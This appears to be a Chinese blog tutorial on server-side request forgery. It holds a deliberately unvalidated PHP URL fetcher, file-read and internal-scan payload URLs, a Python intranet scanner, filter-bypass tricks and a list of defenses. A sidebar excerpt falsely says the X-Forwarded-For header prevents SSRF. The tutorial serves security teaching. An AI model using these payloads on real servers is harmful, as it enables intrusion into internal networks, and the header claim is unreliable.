SSRF-服务器端请求伪造

最新推荐文章于 2024-01-16 22:35:38 发布
最新推荐文章于 2024-01-16 22:35:38 发布
阅读量181 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/echo__h/article/details/131171086
版权

SSRF服务器端请求伪造



SSRF介绍及原理

1.概述

SSRF(Server-Side Request Fogery),服务器端请求伪造。是一种由攻击者构造请求,由服务器端发送请求的漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统。

2.原理

其形成的原因大都是由于服务器提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格的过滤和限制。

简单来说就是攻击者利用服务器漏洞以服务器的身份发送一条构造好的恶意请求给服务器所在内网进行攻击。

找了一个大师傅画的图,方便理解

image-20230503120722031



测试环境搭建

php中可以通过以下三种方式远程获取目标服务器的资源

1.file_get_contents();

发送get请求,读取响应内容并输出

$resp = file_get_contents("http://www.baidu.com");
echo $resp;
2.fsockopen();

基于传输层

<?php
// 建立一个到http://www.xxx.com:80的连接,超时时间30s
$fp = fsockopen('http://www.xxx.com/', 80, $errno, $errstr, 30);
// 拼接http请求头
$out = "GET / HTTP/1.1\r\n";
$out .= "Host:www.xxx.com\r\n";
$out .= "Connection:Close\r\n\r\n";
// 将请求写入$fp发送
fwrite($fp, $out);
// 按行读取响应内容
while (!feof($fp)) {
    echo fgets($fp, 1024);
}

fclose($fp);
?>
3.curl_exec();

GET

$ch = curl_init();
// URL地址及相关配置选项
curl_setopt($ch, CURLOPT_URL, "http://www.baidu.com");
curl_setopt($ch, CURLOPT_HEADER, 0);
// 抓取URL传递给服务器
curl_exec($ch);
// 释放
curl_close($ch);

POST

$url = "http://192.168.30.103/work/login.php";
$data = 'username=zerok&password=123456';
$ch = curl_init();
// 指定参数
$params[CURLOPT_URL] = $url;
$params[CURLOPT_RETURNTRANSFER] = true;	// 是否将结果返回
$params[CURLOPT_FOLLOWLOCATION] = true;	// 是否重定向
$params[CURLOPT_TIMEOUT] = 30;			// 超时时间(s)
$params[CURLOPT_POSTFIELDS] = $data;	// 指定POST参数值
// 传入curl参数
curl_setopt_array($ch, $params);
// 执行
$res = curl_exec($ch);
echo $res;
curl_close($ch);



漏洞利用

准备以下代码

$url = $_GET['url'];
$ch = curl_init();
// URL地址及相关配置选项
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
// 抓取URL传递给服务器
curl_exec($ch);
// 释放
curl_close($ch);
1.读取文件

通过file://协议可以fuzz、读取服务器上的文件

http://192.168.30.1/temp/ssrf.php?url=file://[path]
2.内网扫描

根据回显,扫描存活的IP、端口

http://192.168.30.1/temp/ssrf.php?url=192.168.30.[1~254]:[port]		# [url]和[port]为爆破点

可以使用python或者Burpsuite对ip、端口进行扫描

demo,没有优化,只是实现基本的扫描思路

import requests, datetime


def ssrfForce(url):

    # 响应头
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
                      "Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.48",
        "Cookie": ""
    }

    # 处理url地址,提取ip和端口号
    url_ = url.split('=')[0]
    ip = url.split('=')[1]
    if ip[0:3] >= '192':
        # C类网段,替换最后一组
        rep_index = ip.find(ip.split('.')[-1])
        ip_rep = ip[0:rep_index]
        # 遍历ip
        for ip_ in range(1,255):
            try:
                uurl = f"{url_}={ip_rep}{ip_}"
                resp = requests.get(uurl, timeout=1, headers=headers)
                # 根据响应状态判断
                if resp.status_code == 200:
                    print( f"---------{datetime.datetime.now()}---------")
                    print(f'{uurl} maybe online')
            except requests.exceptions.ReadTimeout:
                pass
        print("End of scan.")

if __name__ == '__main__':
    ssrfForce('http://localhost/temp/ssrf.php?url=http://192.168.30.111')

内网网段

10.0.0.0–10.255.255.255

172.16.0.0–172.31.255.255

192.168.0.0–192.168.255.255

3.获取指纹

根据扫描的内网ip和端口,进而获取服务器指纹信息



SSRF漏洞发现
1.url中的参数名
share
wap
url
link
src
source
target
u
3g
display
sourceURL
imgaeURL
domain
2.常见功能和场景
分享功能
在线翻译
转码服务
图片加载和下载
图片、文章收藏功能
未公开的api实现及其他调用URL的功能



SSRF漏洞的判断
1.完全回显

通过响应判断是否存在漏洞

2.半回显

通过响应的状态码等判断

3.无回显

  • DNSlog:需要有一个可以配置的域名,例如ceye.io

  • 公网服务器,查看日志



SSRF利用协议
1.gopher://

gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,在构成符合gopher协议的请求。gopher协议是ssrf利用中最强大的协议

2.dict://

允许客户端在使用过程中访问更多字典

http://localhost/temp/ssrf.php?url=dict://192.168.30.103:80
3.file://

读取文件

4.http://

url跳转



SSRF绕过姿势
1.@符号绕过

例如http://www.baidu.com@10.10.10.10等同于http://10.10.10.10

2.点分割符号替换

例如

http://www. baidu. com
http://www。baidu。com
3.本地回环地址
http://127.0.0.1/
http://localhost/
http://[::1]/
http:/127.1/
http://0:80
http://127.0.0.1 - 127.255.255.254
4.ip进制转换

例如 http://192.168.30.1

  • 八进制:http://300.247.036.001

  • 十六进制:http://0xc0.0xa8.0x1e.0x01

5.短网址

访问短网址会重定向302



SSRF防御

1.只允许HTTP、HTTPS协议,或禁用高危协议

2.设置URL地址和IP白名单

3.统一错误信息,避免用户根据错误信息判断服务器状态信息等

4.禁止302跳转,或者每跳转一次都进行校验目的地址是否为内网地址或合法地址。

5.限制请求端口为http常用的端口



ZeroK_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#[email protected]:80/ http://127.88.23.245:22/+&@google.com:80#[email protected]:80/ ...
Web Hacking 101 中文版 十七、服务端请求伪造
weixin_34166847的博客
03-28 145
十七、服务端请求伪造 作者:Peter Yaworski 译者:飞龙 协议:CC BY-NC-SA 4.0 描述 服务端请求伪造,或者 SSRF,是一种类型,它允许攻击者使用目标服务器来代表攻击者自己执行 HTTP 请求。这和 CSRF 类似,因为两个漏洞都执行了 HTTP 请求,而不被受害者察觉。在 SSRF 中,受害者是漏洞服务器...
SSRF(服务器端请求伪造
qq_56289291的博客
08-02 1559
服务器端请求伪造SSRFServer-SideRequestForgery)是一个Web安全漏洞,指攻击者诱导服务器将HTTP请求发送到攻击者选择的一个目标上。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。例如通过127.0.0.1就能访问本机,192.168.*.*就能访问内网C段。...
【CTF】SSRF服务器端请求伪造
qq_53099119的博客
04-02 2088
从本题来看,他说他在baidu.com下放了一个flag.txt,但是试想一下,这个baidu.com是不可能为真正的百度的那个域名的,所以此处这个baidu.com应该为出题者所建的一个目录,所以就是ssrf读文件,我们就想到使用file协议来读取flag.txt这个文件。此处表示,截取所输入内容中的从第7位开始,长度为9的字符串,如果他的内容为baidu.com,那么程序也会die,而且我们所需要用的file://协议恰巧与http://协议长度相同,就很气人。
初识——服务器端请求伪造SSRF)
sGanYu
08-16 1511
SSRF:Server-Side Request Forgery服务器请求伪造。 一种由攻击者构造请求,由服务器端发起请求的安全漏洞,漏洞属于信息泄露的一种。一般情况下,SSRF的攻击目标是网站的内部系统(正因为请求是由服务器端发起的,所以服务器能请求到与自身相连而与外网隔离的内部系统),只要当前服务器有向其他服务器发送请求的地方都可能存在SSRF漏洞。 漏洞原理: 大多数web应用都提供了从其他服务器上获取数据的功能,web应用根据用户指定的URL向其他服务器请求图片,文件等资源。一旦..
ssrf-req-filter:在 NodeJS 中发送请求时防止 SSRF 的模块。 阻止对本地和私有 IP 地址的请求
05-31
服务器端请求伪造 (SSRF) SSRF 是一种攻击媒介,它滥用应用程序与内部/外部网络或机器本身进行交互。 此向量的促成因素之一是 URL 处理不当。 安装 npm install ssrf-req-filter 用法 轴: const ssrfFilter = ...
SSRF_Vulnerable_Lab:本实验包含易受服务器端请求伪造攻击的示例代码
05-12
服务器端请求伪造SSRF)易受攻击的实验室该存储库包含容易受到服务器端请求伪造SSRF)攻击PHP代码。 我想对@ albinowax,AKReddy,Vivek Sir(感谢一直以来支持我的杰出人物),Andrew Sir-@vanderaj(感谢他的...
CVE-2021-21975:[CVE-2021-21975] VMware vRealize Operations Manager API服务器端请求伪造SSRF)
04-03
[CVE-2021-21975] VMware vRealize Operations Manager API服务器端请求伪造SSRF) vRealize Operations(vROps)是一种工具,可将AI推动的IT运营管理从应用程序自动部署到基础架构,以优化,规划和扩展VMware ...
ssrfuzz:SSRFuzz是使用CRLF链接功能查找服务器端请求伪造漏洞的工具。
05-07
SSRFUZZ SSRFuzz是使用CRLF链接功能查找服务器端请求伪造漏洞的工具。为什么? 我想用Golang编写并发工具我想模糊参数SSRF vulnerablities,以及模糊的CRLF注入两条路径及参数Orange的工作使我将这些类型的漏洞链接...
Web漏洞之SSRF(服务器端请求伪造
薛定谔嘚喵博客
05-08 1209
如果没有对用户提交URL 和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造”的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。SSRF是一种由攻击者发起的伪造服务器发送的请求的一种攻击。对用户输入的URL 没有进行恰当的过滤,导致任意URL 输入。使用用户指定的URL,Web 应用可以获取图片或者文件资源等。通过SSRF漏洞可以实现对内网的访问,从而可以攻击内网应用。●限制IP,避免应用被用来获取内网数据,攻击内网;●过滤返回信息,只要不符合要求的,全部过滤;
网络安全进阶学习第四课——SSRF服务器请求伪造
p36273的博客
07-01 976
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是指攻击者能够从易受攻击的Web应用程序发送精心设计的请求的对其他网站进行攻击。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统,也就是内网。利用一个可以发起网络请求的服务,当做跳板来攻击其它服务。
「 典型安全漏洞系列 」04.服务器端请求伪造SSRF详解
最新发布
网络安全
01-16 1257
实验室环境为支持库存检查功能的购物网站,存在SSRF漏洞,可以利用漏洞来使用管理员权限删除普通用户。。
SSRF01】服务器端请求伪造——漏洞基础原理及攻防
Fighting_hawk的博客
03-15 6132
1. 理解SSRF漏洞的攻击原理; 2. 掌握SSRF漏洞的挖掘方式; 3. 掌握SSRF漏洞的攻击方式和利用方式; 4. 掌握SSRF漏洞的防御方式。
服务器端请求伪造--SSRF 简单小结
weixin_44769042的博客
10-31 261
目录 1.什么是ssrf 2.原理草图 3.ssrf可以干什么 4.测试协议 1> file:/// 2> dict:// 3> sftp:// 4> tftp:// 5>gopher:// 1.什么是ssrf SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,有服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统。 2.原理草图 比如说,...
SSRF服务器端请求伪造攻击详解
m0_51468027的博客
02-07 5828
一、SSRF概述   SSRF(Server-Side Request Forgery:服务器端请求伪造),是一种由攻击者构造请求,由服务端发起请求的安全漏洞。   其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据   数据流:攻击者----->服务器----->目标地址   根据后台使用函数的不同,对应的影响和利用方法又有不一样   PHP中下面函数的使用不
SSRF服务器端请求伪造
weixin_59872639的博客
03-02 1756
SSRF服务器端请求伪造 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造恶意数据,形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统,正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制,比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等 SSRF常见场景
SSRF-服务端请求伪造
weixin_42739903的博客
01-06 280
SSRF漏洞介绍和一些例题
SSRF 服务器端请求伪造
jexsen的博客
03-30 104
SSRF 服务器端请求伪造 一、SSRF是什么?二、SSRF长什么样?三、如何利用SSRF?四、如何绕过防护拦截? 一、SSRF是什么? SSRF是服务器端请求伪造的英文缩写,是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。 当你可以控制一个网站去访问其他网站的时候,这个网站就有可能存在SSRF。这意味着你可以用这个网站的名义去访问其他网站,这就存在一个问题,我们这时就有可能访问到原本访问不到的网站,比如一些内网网站。因为用的是内网自己人的名义,所以防火墙不会拦截,从而可以进一步发掘.
24.下面哪个请求头可以用于防止SSRF攻击? X-Content-Type-Options X-Forwarded-For X-Frame-Options X-XSS-Protection
07-20
X-Forwarded-For请求头可以用于防止SSRF(Server-Side Request Forgery,服务器端请求伪造)攻击。 SSRF攻击是一种利用服务器端应用程序的漏洞,使攻击者能够发送伪造请求到内部网络或其他受信任的服务器的攻击方式。攻击者可以通过构造恶意的请求,欺骗服务器端应用程序访问或执行受限资源。 X-Forwarded-For请求头是一种常见的HTTP请求头,用于指示请求的真实客户端IP地址。在防止SSRF攻击方面,服务器端应用程序可以检查X-Forwarded-For请求头中的IP地址,以确保请求来自可信的来源。 其他列出的请求头也与安全相关,但与防止SSRF攻击无直接关联,它们的作用如下: - X-Content-Type-Options:用于指示浏览器是否应该嗅探响应的内容类型。它可以帮助防止某些类型的跨站脚本攻击(XSS),但与SSRF攻击无关。 - X-Frame-Options:用于指示浏览器是否允许通过框架嵌入网页。它有助于防止点击劫持攻击,但与SSRF攻击无关。 - X-XSS-Protection:用于启用或禁用浏览器内置的跨站脚本攻击(XSS)过滤器。它也是与防止XSS攻击有关,与SSRF攻击无直接关联。 因此,X-Forwarded-For是用于防止SSRF攻击的请求头选项。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值